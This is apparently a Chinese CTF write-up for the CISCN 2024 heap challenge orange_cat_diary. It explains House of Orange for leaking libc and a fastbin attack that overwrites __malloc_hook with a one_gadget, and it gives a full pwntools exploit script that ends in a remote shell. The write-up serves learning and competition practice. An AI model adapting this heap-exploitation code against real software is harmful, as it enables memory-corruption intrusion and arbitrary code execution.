【PWN · House_Of_Orange | fastbin-attack】[CISCN 2024 初赛] orange_cat_diary

于 2024-05-19 21:20:24 发布
阅读量1k 收藏 14
点赞数 10
分类专栏: 【PWN · Heap】 文章标签: ctf pwn house of orange heap fastbin attack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/139048316
版权

蒟蒻现做现学.。。说实话,house系列,之前都不敢下手,想着积淀积淀。没想到,嗯,还挺简单。

目录

前言

一、House-Of-Orange

二、简单的wp

三、EXP

总结 

前言

审计一下题目:经典菜单,edit,show,add,delete俱全

嗯,啧啧,delete还有个UAF太明显,爽爽unsortedbin-leak-libc!

——what!show只能一次,delete只能一次!!!救命。。。我该怎么做。

一、House-Of-Orange

虽然说house系列我不敢轻易上手学,但是各个手法的名字我还是听过的——本题的名字就叫做Orange_cat_diary,是不是一种暗示?

典型题目

Hitcon CTF 2016 - house of orange 做题笔记_hticon house of orange-CSDN博客

关于house of orange(unsorted bin attack &&FSOP)的学习总结 - ZikH26 - 博客园 (cnblogs.com)(2021安询杯,和本题高度相似)

适用范围

2.23——2.26

◆没有free

◆可以unsortedbin attack、

利用方式

stage1

◆申请chunk A,假设此时的top_chunksize0xWXYZ。

◆写A,溢出修改top_chunksize0xXYZ(需要满足页对齐的检测条件)。

◆申请一个大于0xXYZ大小的chunk,此时top_chunk会进行grow,并将原来的old top_chunk释放进入unsortedbin。

stage2

◆溢出写A,修改处于unsortedbin中的old top_chunk,修改其size0x61,其bk&_IO_list_all-0x10,同时伪造好IO_FILE结构。

◆申请非0x60大小的chunk的时候,首先触发unsortedbin attack,将_IO_list_all修改为main_arena+88,然后unsortedbin chunk会进入到smallbin,大小为0x60;接着遍历unsortedbin的时候触发了malloc_printerr,然后调用链为:malloc_printerr -> libc_message -> abort -> _IO_flush_all_lockp,调用到伪造的vtable里面的函数指针。

注意:可以在没有free的情况下leak libc!这正是我们所需要的 

二、简单的wp

Free后指针未清零,存在UAF漏洞,但是本题有几个限制

free和show只有一次机会。

基本思路是hook劫持,首先要泄露libc,受限于free只能free一次,于是用house_of_orange手法(题目名称也暗示了)leak libc。此时只用了一次show

然后用唯一的一次free机会,进行fastbin-attack;用uaf将bin里的fastbinchunk-next写fake-chunk到malloc_hook附近。

写malloc_hook劫持为one_gadget即可

orange_cat_diary利用链:

  1. show只有一次机会的限制:利用house_of_orange进行leak libc

  2. free只有一次机会的限制:利用uaf进行fastbin-attack

  3. 劫持fake-chunk到malloc_hook附近

  4. 劫持malloc_hook到one_gadget

  5. malloc触发malloc_hook

三、EXP

from pwn import *
context(arch='amd64',log_level='debug')

one_gadget=[0x45226,0x4527a,0xf03a4,0xf1247] # 0xf03a4成功了
for onegadget in one_gadget:
    # io=process('./pwn')
    # gdb.attach(io);input()
    io=remote(ip,port)
    libc=ELF('./libc-2.23.so')

    def add(size,content):
        io.sendlineafter(b'choice:',b'1')
        io.sendlineafter(b'content:',str(size).encode())
        io.sendlineafter(b'content:',content)

    def edit(size,content):
        io.sendlineafter(b'choice:',b'4')
        io.sendlineafter(b'content:',str(size).encode())
        io.sendlineafter(b'content:\n',content)

    def show():
        io.sendlineafter(b'choice:',b'2')

    def delete():
        io.sendlineafter(b'choice:',b'3')

    io.sendline(b'name')
    io.recvuntil(b'stories.\n')
    add(0x18,b'aa')
    edit(0x20,p64(0)*3+p64(0xfe1))
    add(0x1000,b'')
    add(0x30,b'')
    # print(show())
    show()
    main_arena=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-1514
    success(hex(main_arena))
    malloc_hook=main_arena-0x10
    libc_base=main_arena-0x3c3b20-0x1000 #一开始本地的libc版本有点问题,正确的libc刚好还要偏0x1000
    success(hex(libc_base))
    fake_chunk=malloc_hook-0x23

    add(0x60,b'')
    delete()
    edit(0x60,p64(fake_chunk))
    add(0x60,b'')
    add(0x60,b'')

    '''
    0x45226 execve("/bin/sh", rsp+0x30, environ)
    constraints:
    rax == NULL

    0x4527a execve("/bin/sh", rsp+0x30, environ)
    constraints:
    [rsp+0x30] == NULL

    0xf03a4 execve("/bin/sh", rsp+0x50, environ)
    constraints:
    [rsp+0x50] == NULL

    0xf1247 execve("/bin/sh", rsp+0x70, environ)
    constraints:
    [rsp+0x70] == NULL
    '''

    # payload=p64(0)+b'\x00\x00\x00'+p64(libc_base+onegadget)+p64(libc_base+libc.sym['realloc']) 一开始libc错了,还以为堆风水不好,,,(实际是libc基址都错了,也就有了上面的-0x1000)
    # edit(0x60,payload)
    edit(0x60,b'\x00'*0x13+p64(libc_base+onegadget))
    io.sendlineafter(b'choice:',b'1')
    io.sendlineafter(b'content:',b'sh')
    io.interactive()

总结

比较惊险,磨了半天,学习house of orange然后利用,居然真的过了。那一刻的高兴至今难忘。

Mr_Fmnwon
关注
  • 10
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
fastbin attack漏洞之__malloc_hook攻击
董哥的黑板报
08-12 5463
__malloc_hook攻击原理为fastbin attack,见文章:https://blog.csdn.net/qq_41453285/article/details/99315504 一、概念 通过fastbin attack,我们可以发起__malloc_hook攻击,将__malloc_hook作为我们的target 二、攻击方向 方向①:我们可以将__malloc_hook函数...
强网杯2022 pwn 赛题解析——house_of_cat
CoLin的pwn小屋
08-04 2809
强网杯2022 pwn 赛题分析——house_of_cat
how2heap(1):fastbin_dup 2.31
hollk’s blog
08-25 798
fastbin_dup 2.27 源码 # gcc -g fastbin_dup.c -o fastbin_dup 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <assert.h> 4 5 int main() 6 { 7 setbuf(stdout, NULL); 8 9 printf("This file demonstrates a
BUUCTF|PWN-ciscn_2019_n_8-WP(格式化字符串漏洞)
l2645470582_的博客
01-11 2256
1.检查保护机制 (1)保护全开 2.运行看一下 3.我们用32位的IDA打开该文件 (1)Ctrl+F12查看关键字符串 (2)查看反编译代码 (3)条件满足var[13]!=0 &&var[13] ==17,才能拿到权限 (4)var[13]位置在第十四个上 payload构造 第一种: payload = b'a'*13*4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节 ...
好好说话之Fastbin Attack(2):House Of Spirit
hollk’s blog
10-30 2967
Fastbin Attack的第二种攻击方式House Of Spirit,相对来说是double free的升华。在检查绕过的时候会相对麻烦一点,其他的地方还是挺简单的,如果上一篇文上你领悟的很好的话,这篇文章也不会很难理解。 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
攻防世界PWNhouse_of_grey题解
seaaseesa的博客
12-09 1770
house_of_grey 首先,检查一下程序的保护机制,发现保护全开 然后,我们用IDA分析一下 发现是一个读取文件并显示的程序,除了flag文件,其他文件都可以读取 程序有个缓冲区溢出漏洞 可以溢出,修改v8指针,然后我们就可以利用功能4,实现任意地址写 由于可以读取除了flag之外的文件,那么我们可以读取/proc/self/maps文件 Linux 内核提...
IO_file结构、FSOP、house of orange总结
qq_39153421的博客
03-30 2390
占个坑 总结目录: IO_file相关结构 FSOP libc2.23利用方式 修改vtable libc2.24 添加check 利用io_str_jumps io_str_overflower io_str_finish io_buf_base scanf libc2.27 利用方式 例子:2018suctf note(libc2.24) clear_note(io_str_overflows、io_str_finish有一定几率失败) 参考文章 https://xz.aliyun.co
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
96_基于Android的美食推荐 APP-源码.zip
06-01
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。
南京大学分布式系统课程实验.zip
最新发布
06-01
南京大学分布式系统课程实验.zip
mysql开发教程&案例&相关项目概要介绍.docx
06-01
MySQL作为一款广泛使用的开源关系型数据库管理系统,在软件开发中扮演着核心角色。以下是对MySQL开发教程、案例及相关项目概要的综合介绍: ### MySQL开发教程概览 **黑马程序员MySQL全套教程** - **目标群体**:适合零基础至进阶水平的学习者,特别是希望从事IT行业并期望通过MySQL技能提高薪资的学员。 - **课程内容**: - **学前须知**:要求学员具备Python基础知识及网络多线程知识。 - **开发工具**:使用Navicat(MySQL的图形化界面客户端)及MySQL自身的客户端与服务端(推荐版本5.0左右)。 - **课程重点**:涵盖MySQL的图形界面操作、终端CRUD操作,以及通过Python与MySQL交互实现黑马订单管理系统的开发,包括查询、增加、删除、修改订单等功能。 - **课程目标**: - 理解数据库分类、MySQL的应用场景。 - 安装并使用Navicat进行数据操作。 - 安装MySQL并进行终端的数据库操作。 - Python与MySQL的交互编程。 - 完成黑马订单管理系统的实战项目。
儿童节 python庆祝代码简要介绍-20240601.docx
06-01
为了庆祝儿童节,我们可以用Python编写一个简单而有趣的程序,比如一个猜数字的小游戏,这非常适合孩子们玩耍。游戏规则很简单:计算机随机生成一个1到50之间的数字,玩家尝试猜测这个数字,计算机会根据玩家的输入给出提示(太高、太低或猜对了),直到猜中为止。下面是一个实现这个小游戏的Python代码示例: ```python import random print("我想了一个1到50之间的数字,你能猜到是多少吗?") # 生成一个1到50之间的随机数作为答案 secret_number = random.randint(1, 50) guesses_taken = 0 # 开始猜测循环 while True: try: # 获取玩家的输入并确保它是一个有效的整数 guess = int(input("请输入你的猜测:")) guesses_taken += 1 if guess < secret_number: print
MySQLTuner,一个用Perl编写的脚本,它允许你快速审查MySQL安装情况,并进行调整以提高性能和稳定性
06-01
MySQLTuner是一个用Perl编写的脚本,它允许你快速审查MySQL安装情况,并进行调整以提高性能和稳定性。它会检索当前的配置变量和状态数据,并以简洁的格式呈现,同时提供一些基本的性能建议。
JAVA+SQL办公自动化系统(源代码+论文+外文翻译)
06-01
JAVA+SQL办公自动化系统(源代码+论文+外文翻译)
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过计算偏移量得到libc的基址,进而计算出system函数和/bin/sh字符串的地址。最后,通过构造ROP链来调用system函数,并将/bin/sh字符串作为参数传入,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [[BUUCTF]PWN——xdctf2015_pwn200](https://blog.csdn.net/mcmuyanga/article/details/109622553)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [xdctf2015_pwn200](https://blog.csdn.net/weixin_44309300/article/details/130628776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值